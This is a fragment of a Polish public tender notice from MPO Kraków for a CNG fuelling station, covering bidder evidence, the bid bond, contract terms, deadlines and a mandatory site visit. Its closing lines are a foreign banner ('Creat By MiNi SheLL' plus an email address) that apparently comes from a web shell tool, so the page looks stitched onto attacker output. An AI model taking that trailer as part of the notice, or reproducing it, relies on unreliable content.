wykluczeniu został zamieszczony w pkt. &#34;Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu&#34;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Do oferty Wykonawca zobowiązany jest dołączyć: - oświadczenie, iż Wykonawca spełnia warunek uczestnictwa, o którym mowa w pkt. 9 d) tiret<br/>1 SWZ – zgodnie z zał. 2 c) do SWZ.<br/>- oświadczenie, iż Wykonawca spełnia warunek uczestnictwa, o którym mowa w pkt. 9 d) tiret<br/>2 i 3 SWZ – zgodnie z zał. 2 d) do SWZ.<br/>b) Informacje zawarte w oświadczeniach, o których mowa w lit. a) stanowią wstępne potwierdzenie,<br/>że Wykonawca spełnia warunki uczestnictwa w<br/>postępowaniu.<br/>c) Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>d) Podmiotowe środki dowodowe wymagane od Wykonawcy na potwierdzenie spełnienia warunków<br/>udziału Wykonawcy w postępowaniu obejmują.<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty - zgodnie z zał. 2 e) do SWZ.<br/>- dowody określające, czy wykazane przez Wykonawcę roboty budowlane, o których mowa<br/>w pkt. 9 d) tiret 1 SWZ, zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji przedmiotowego zamówienia<br/>publicznego wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do<br/>dysponowania tymi osobami - zgodnie z zał. 2 f) do SWZ<br/>Uwaga!!!<br/>Ciąg dalszy z pkt. &#34;Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu&#34;<br/>-Oświadczenie, iż informacje zawarte w oświadczeniu, stanowiącym zał. nr 2 a) – 2 b) do<br/>SWZ są aktualne na dzień składania niniejszego oświadczenia tzn. że Wykonawca nie<br/>podlega wykluczeniu z postępowania na podstawie:<br/>* art. 108 ust. 1 pkt. 3 ustawy Pzp;<br/>* art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>* art. 108 ust. 1 pkt. 6 ustawy Pzp;<br/>* art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (t.j. Dz. U. z 2022 poz. 835);<br/>* art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących<br/>płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia<br/>1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170),<br/>* art. 109 ust. 1 pkt. 5 oraz 7 ustawy Pzp.<br/>Zamawiający zaleca sporządzenie oświadczenia zgodnie ze wzorem stanowiącym zał. nr 2 i)<br/>do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda załączenia przez Wykonawcą do oferty przedmiotowych środków dowodowych w postaci:<br/>a) szczegółowego opisu oferowanych w ramach przedmiotu niniejszego zamówienia maszyn i<br/>urządzeń (opisy, karty katalogowe, rysunki, karty urządzeń wraz z ich parametrami) tj.:<br/>dystrybutory, sprężarki, układ osuszania gazu, magazyn gazu CNG. Należy także podać<br/>producenta, typ i model dla każdego z ww. urządzeń.<br/>b) schematu technologicznego oferowanego przedmiotu zamówienia;<br/>c) naniesionego na mapie (stanowiącej zał. nr 2 i) do SWZ) planowanego rozkładu<br/>poszczególnych elementów wchodzących w zakres przedmiotu zamówienia wraz z<br/>zaznaczeniem planowanego układu komunikacyjnego dróg. Zamawiający zaleca sporządzenie<br/>ww. dokumentu w formacie „pdf”.<br/>Zamawiający informuje, iż w odniesieniu do przedmiotowego środka dowodowego, o którym mowa w<br/>lit. a) – c) będzie miała zastosowanie procedura, o której mowa w art. 107 ust. 2 ustawy Pzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający informuje, iż w odniesieniu do przedmiotowego środka dowodowego, o którym mowa w pkt 11 lit. a) – c) SW będzie miała zastosowanie procedura, o której mowa w art. 107 ust. 2 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> a) Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:<br/>30 000 złotych (słownie złotych: trzydzieści tysięcy złotych 00/100)<br/>b) Wadium należy wnieść się przed upływem terminu składania ofert.<br/>c) Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą.<br/>d) Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>- pieniądzu;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. 2000 Nr 109<br/>poz. 1158 ze zm.)<br/>e) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:<br/>Bank Pekao SA 58 12406292 1111 0010 8664 9233 z adnotacją: „wadium do przetargu nr TZ/TT/3/2022”<br/>f) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>g) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>h) Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>- upływu terminu związania ofertą;<br/>- zawarcia umowy w sprawie zamówienia publicznego;<br/>- unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego<br/>wniesienia.<br/>i) Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium Wykonawcy:<br/>- który wycofał ofertę przed upływem terminu składania ofert;<br/>- którego oferta została odrzucona;<br/>- po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza;<br/>- po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>j) Złożenie wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz<br/>z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX ustawy Pzp.<br/>k) Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy<br/>rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia<br/>rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy<br/>wskazany przez Wykonawcę.<br/>l) Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>m) Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie<br/>gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4 ustawy Pzp, występuje<br/>odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1<br/>ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków<br/>dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o<br/>których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w<br/>art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na<br/>poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak<br/>możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/>- Wykonawca, którego oferta została wybrana:<br/>* odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w ofercie,<br/>* nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących<br/>po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> - Zamawiający określa szczegółowy, obiektywnie uzasadniony, sposób spełniania przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunków udziału w<br/>postępowaniu. W przypadku podmiotów składających ofertę wspólną, warunek o którym mowa<br/>w pkt. 9. d) tiret 1 SWZ musi spełniać jeden podmiot - warunek ten nie podlega dzieleniu.<br/>Powyższy wymóg dotyczy również podmiotów trzecich na potencjale których Wykonawca<br/>polega w celu wykazania spełnienia warunku udziału w postępowaniu na zasadach określonych<br/>w art. 118 ustawy Pzp.<br/>- Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej<br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, do których realizacji te uprawnienia są wymagane (nie dotyczy).<br/>- W przypadku, gdy ofertę składają Wykonawcy wspólnie w okolicznościach wskazanych w art. 117<br/>ust. 2 i 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które dostawy, usługi lub roboty budowalne wykonają<br/>poszczególni wykonawcy .<br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje dokonywanie zmian w zawartej umowie w zakresie i na zasadach<br/>określonych w projekcie umowy stanowiącym zał. nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mpo krakow.logintrade.net.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający działając zgodnie z art. 95 ustawy Pzp żąda aby Wykonawca lub podwykonawca zatrudniał na podstawie stosunku pracy osoby wykonujące prace instalacyjno-montażowe maszyn i urządzeń wchodzących w zakres przedmiotu niniejszego zamówienia.<br/>2. Zamawiający żąda odbycia przez Wykonawcę wizji lokalnej. Wizja lokalna ma charakter<br/>obligatoryjny tj. zgodnie z art. 226 ust. 1 pkt. 18 ustawy Pzp Zamawiający odrzuci ofertę<br/>Wykonawcy który nie odbył wizji lokalnej, o której mowa powyżej.<br/>Wykonawcy zobowiązani są zgłosić chęć uczestnictwa w ww. wizji na adres e-mail:<br/>beata.wolnik@mpo.krakow.pl w terminie nie później niż 48 godzin przed planowanych terminem<br/>wizji wyznaczonej przez Zamawiającego. Z ramienia każdego Wykonawcy w wizji mogą<br/>uczestniczyć nie więcej niż 2 osoby. Jeżeli ilość osób chcących odbyć wizję w pierwszym terminie<br/>będzie przekraczać 8 osób Zamawiający wyznaczy dodatkowy termin na odbycie wizji lokalnej dla<br/>pozostałych osób jednakże nie później niż 2 dni robocze od planowanego terminu pierwszej wizji<br/>lokalnej.<br/>Pierwsza wizja lokalna odbędzie się w dniu 20. 05. 2022 r. Miejsce zbiórki – Portiernia MPO<br/>Sp. z o.o. przy ul. Nowohuckiej 1.<br/>Wykonawcy będą mogli zapoznać się z miejscem na którym realizowana będzie przedmiotowa<br/>inwestycja.<br/>Zamawiający podczas wizji lokalnej nie będzie udzielał odpowiedzi na jakiekolwiek zapytania.<br/>Zamawiający podczas wizji, o której mowa powyżej wyda osobom uczestniczącym w ww. wizji<br/>oświadczenie o odbyciu obligatoryjnej wizji lokalnej które to oświadczenie Wykonawca<br/>zobowiązany jest załączyć do oferty.<br/>Terminy zadawania pytań i udzielnych odpowiedzi reguluje art. 284 ustawy Pzp.<br/>3. PODWYKONAWSTWO<br/>a) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>b) Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>zadań.<br/>c) Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom,<br/>Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć<br/>podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych<br/>podwykonawców.<br/>4. OPIS SPOSOBU PRZYGOTOWANIA OFERTY:<br/>a) Każdy Wykonawca może złożyć tylko jedną ofertę.<br/>b) Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej i<br/>podpisana:<br/>- kwalifikowanym podpisem elektronicznym wystawionym przez dostawcę kwalifikowanej<br/>usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne - podpis<br/>elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie lub<br/>- podpisem zaufanym lub<br/>- podpisem osobistym.<br/>Lista podmiotów udostępniających usługę kwalifikowanego podpisu elektronicznego dostępna jest na stronie www.nccert.pl<br/>c) Ofertę (wraz z wszystkimi załącznikami stanowiącymi jej integralną część) należy przesłać za pośrednictwem Platformy Przetargowej znajdującej się pod linkiem:<br/>https://mpo-krakow.logintrade.net/reg,info,wymaganiatechniczne.html.<br/>d) Oferta musi być podpisana przez osoby upoważnione do reprezentowania Wykonawcy w<br/>przedmiotowym postępowaniu. Reprezentacja, o której mowa w zdaniu poprzednim musi wynikać z przedłożonego przez Wykonawcę odpisu lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej oraz pełnomocnictwa załączonego<br/>do oferty.<br/>5. Zamawiający żąda zabezpieczenia należytego wykonania umowy w wysokości 5% ceny brutto<br/>całkowitej podanej w ofercie.<br/>6. Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych zadań. Przez kluczowe zadania, o których mowa w zdaniu poprzednim, Zamawiający rozumie wszelkie prace związane ze skompletowaniem nowych urządzeń, instalacji i wyposażenia niezbędnego dla prawidłowego funkcjonowania inwestycji oraz montaż nowych urządzeń, instalacji i wyposażenia niezbędnego dla prawidłowego funkcjonowania inwestycji, w ramach niniejszego zamówienia publicznego.

Creat By MiNi SheLL
Email: jattceo@gmail.com